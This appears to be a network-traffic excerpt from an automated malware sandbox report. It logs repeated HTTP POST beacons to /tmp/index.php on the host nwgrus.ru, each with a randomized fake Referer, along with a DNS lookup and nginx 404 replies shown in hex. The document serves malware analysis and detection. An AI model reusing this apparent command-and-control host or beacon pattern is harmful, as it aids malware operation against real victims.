    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ijwwxiabyxki.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wqfylsyerupgn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oqlpckrtfgisr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vybahkmcxnemgwbs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mmuqkomgbgwmrgx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lpffbcdshmrgy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://espuvwcpdtgkhr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qjhgyfigxhdukho.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qbdfqckmklgu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rccfvowoiuloot.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oxmwgvysvdebn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://liapcosrblojgddt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kargncdaxawnud.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fmwnhyofuij.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rihjcvuphiddchm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oqytxooojaw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vgkkdltoovhgj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://judwwmqxinxkj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tcjadfthgiofpvtt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://phfffsllnpice.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ripegxsqlidtbjlk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://siolcmqbegyqsn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xwvgudwewoih.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cpcybixettuxhrkt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gixrpkowgjh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://voqchluhblp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wxvosrmogsfitpw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pxipmfrupftaxri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://piulubiplhrouqkj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynnjyahqefoad.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gtsvsrpyerihmcqc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qkfisicqugofkqpv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://abelcascgtcbciky.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pcjiyoflornot.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: nwgrus.ru
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
    Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oiwjgaljhmhwar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e9 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
